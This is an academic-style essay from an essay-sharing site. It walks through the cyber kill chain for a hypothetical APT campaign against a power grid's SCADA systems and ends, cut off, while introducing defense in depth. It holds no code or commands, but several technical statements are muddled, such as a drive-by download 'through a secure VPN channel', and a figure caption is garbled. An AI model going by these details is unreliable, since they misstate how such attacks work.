Cyberwarfare is all perpetrated in a specific pattern of events or phases that are referred to as the cyber kill chain. The cyber kill chain consists of steps aimed at finding the right target, fixing the focus on the chosen target, tracking the information on the target, the attacker then selects the right tools to use in the planned attack, the attacker now engages in the target and finally, the attacker assesses the success of the damage done to the target. If not satisfied, the attacker recommends another attack even fatal than the other one. The steps can be summarized to contain seven major steps: Reconnaissance, weaponization, delivery, exploitation, installation, command and acting on objectives as outlined below (Sager, 2014). The major reason for studying the cyber kill chain is to have a better understanding of the attackers work and motives (Hutchins, Cloppert, & Amin, 2016). In this case, knowing their pattern of action can help detect forms of cyberattacks and formulate better defense mechanisms against the attacks.
Notably, understanding the cyber kill chain is the first step of identifying all the supply chain vulnerabilities and the probable attack endpoints that the purported APT activity has on the computers of the Western Interconnection power grid. The severity of the attack therefore, based on the cyber kill chain will be assessed for the power grid. Further, the most relevant recommendations shall be made for the defense against the planned APT attack.
A1. Reconnaissance
Reconnaissance refers to the actions done so as to gain information about the target prior to conducting or even planning an attack. In this case, this step as a cyber kill chain step refers to the activities that the attackers are engaged in so that they can spot the weaknesses and vulnerabilities in the system of their target computer system. The major resources used at this stage are the public websites belonging to the targets, the social media and other public information of the targets members of staff. The email addresses, the mailing listings and conference proceedings. some of the information set researched by the attackers (Stouffer, Pillitteri, Lightman, Abrams, & Hahn, 2015).
In the power grid power scenario, the APT attackers must have targeted the power grid since it serves as a major ICS especially in the Western portion of this continent. It must have used the vulnerability introduced by the previously downloaded SCADA software known as ActiveX control into the organizations webserver which was installed about 8 months ago, which is the period the APT attack is thought to have been initiated.
A2. Weaponization and Delivery
After the attackers have identified their targets, they set out to weaponize the information gathered. In this case, the information gathered is analyzed so that they develop the most appropriate way to attack the targets. The attackers chose whether to attack the targets firewall, their operating systems or any other technology available. At this stage also the attackers may opt to develop the attack by concentrating on a particular person within the target premises and select a major endpoint to initiate the attack. The tool selected for weaponization may be an automated tool deliverable to the targets system or in the form of an infected document such as MS Word documents or Adobe PDF documents.
On weaponization of the information, the attacker determines and delivers the attack into the targets system. The major means of delivery used in this case is the drive-by download where the infected document or weapon is delivered into the system through a secure VPN channel. The targets website or any other web application are the major delivery channels used for this purpose. The Wed application has to be vulnerable whereby they are easily manipulated through a cross-site scripting procedure and thus tampered with easily. Notably, the major goal in this stage is to transmit the weaponized tool to the targets premises (Hutchins, Cloppert, & Amin, 2016). The weaponized targets are then delivered into the targets system via USB removable attachments and through email attachments where the infected documents or any other tools are successfully delivered to the targets system.
The APTs had accessed the webservers of the Western International and attached an infected Adobe PDF which appeared to be the activation manual for the incorporated software. The weaponized malicious document was then downloaded as an email attachment of which the attackers must have managed to deliver into the organization's system.
A3. Exploitation and Installation
Delivery of the attack tools is followed by the exploitation stage in which the malware is activated or triggered in the targets premises. In other words, the code is prompted so that it installed into the system, spread within the system or hid within the system. The DNS or a specific endpoint is first infected awaiting the spread onto other systems within the host target. A subsequent malicious is rapidly spread through the systems if it is meant to do so. The exploitation also offers a way for the attackers to accomplish their ill objectives by scanning through the targets systems servers or applications (Assante & Lee, 2015). The infections can also remain hid within the system so that they are able to evade the security detections and processes.
The infection may tamper with the security systems of the target so that they are undetected and viewed as genuine. Notably, the attacker may exploit the target personnel themselves so that they initiate the infections by the installed malware which may be a set of disguised codes. Also important to note, the installation process mostly includes the use of a remote access Trojan so that the attacker can sustain tenacity within the targets premises.
In our case scenario, the attackers had successfully delivered their malicious document and installed it the moment the document was downloaded and they started exploiting the security personnels (Senior IT Officer) emails. This gave them the advantage of accessing confidential security authentication. They then made their way into the security system, including the surveillance and have since then been monitoring the organizations operations of the organization over the course of several months.
A4. Command and Control
At this stage, the attackers establish command and control channels between their systems and the targets systems. The channels enable them to communicate between the systems and also enable the attacker to convey the intended information between the two systems. In this case, the information is fully encrypted so that the attack remains entirely hidden from the host targets. Specifically, APT attacks often require manual interactions with the target hosts systems instead of the automatic control (at least for the initial step of the attack but in the later steps uses the RAT).
The control and command stage may be initiated immediately the malware is installed on the target system or may be set such that it initializes after a certain preset time. The command and control servers are normally situated such that they are the intermediate systems between the attacker and the target. These servers are such that they hide the original (true) IP address of the attacker in such a way that the targets are unable to determine the true identity of the attacker. This hiding of identity is a major role of command and control.
As already hinted out, the attackers gained the command and control of the organizations surveillance and operation details as soon as the document was for the installation of the Active software was installed on the organizations webserver. They have been observing the companys operations especially the schedule so that they can plot on how to install the major attack malware into the power grid. There is a big probability that there is an inside-man who will enable the second and major attack on the system which is approximated to disrupt the power transmission to eleven states served by the organization. As shown in figure 1, the inside-man only needs to access the modem site 1 or the field site 3 so as to install the final malware and thus the attackers can access the PLC and the RTU on-will basis.
4314825276860on-will entry points
on-will entry points
Figure SEQ Figure \* ARABIC 1: SCADA System General Layout showing the on-will malware delivery point for the organization
A5. Actions
At this stage, the attackers have all the access they need to the targets system. They thus go ahead and carry out what they had in mind at the beginning of the attack. Notably, only a few cyberattacks make it to this stage. If they do, most attackers have the sole intention of doing one or more of the following activities: firstly, the attackers may have the sole purpose of leveraging the attack so that they can perpetrate a bigger attack using the initiated attack at a later period in time. Secondly, the attackers may have the main aim of distorting information or data in the targets system so as to mislead the target victims in a given course of action (Assante & Lee, 2015). Thirdly, the perpetrator may be having the main aim of gaining intelligence on a given matter which he/she monitors through the inserted malware device. Lastly, the attackers may have the main aim of stealing and acquiring sensitive information from the targets system either directly stored in the infected device or other devices that the malware has access to and hence can infect.
In other words, this stage is meant to accomplish their main purpose even though in most cases they do not accomplish the original objectives without being apprehended. For instance, the initial course of action for the installed malware in the Western International organization was concluded to be gathering of intelligence. This is however just but the initial drizzling before the onset of a big storm which will be aimed at disrupting the already mentioned attack on the power grid transmission. The organization is advised to act at the highest pace towards mitigating the oncoming attack since the time for the attack is yet undiscovered.
Defense in Depth
Basing on the articulation and the sophistication of the cyber kill chain and its ultimate results, it requires a susceptible organization a lot of efforts so as to defend itself from such attacks. There exists a number of strategies that any potential target would take in a bid to be cyber-attacker proof at least to some extent. In this document, the defense in depth strategy is explored as a major escape path from cyberwarfare. In todays world where APT attacks are the most common and the world is well interconnected, the Defense in Depth strategy acts as a great way for achieving information assurance (Lockheed Martin Corporation, 2015).
The protection cost and vulnerabilities, the performance, and the operational consideration for the protection measures are the major concerns of the Defense in Depth strategy. Hence, it concentrates on establishing the strategy defines protection based on three major constituents of a vulnerable firm or vulnerable target: people, technology and operations of the potential target as discussed below.
It will be noted that the Defense in Depth strategy is a paradigm that is hinged upon protection, detection, and reaction to the specific cyber threats a system is exposed to such that if subjected to the attacks the victims can make a full recovery from the same. According to the nature of the ICS at stake in the Western International, the malware, if enacted, will lead to...
If you are the original author of this essay and no longer wish to have it published on the SuperbGrade website, please click below to request its removal:
- Networking Security Fundamentals
- The Digital Migration
- Countering Terrorism Within Social Media Platforms in GCC
- Customer Relations in Social Media
- Value of the Internet as a Promotional Tool
- Identify Theft: How to Protect Your Most Valuable Asset
- Expository Essay on Scallop Loss and Spectral Leakage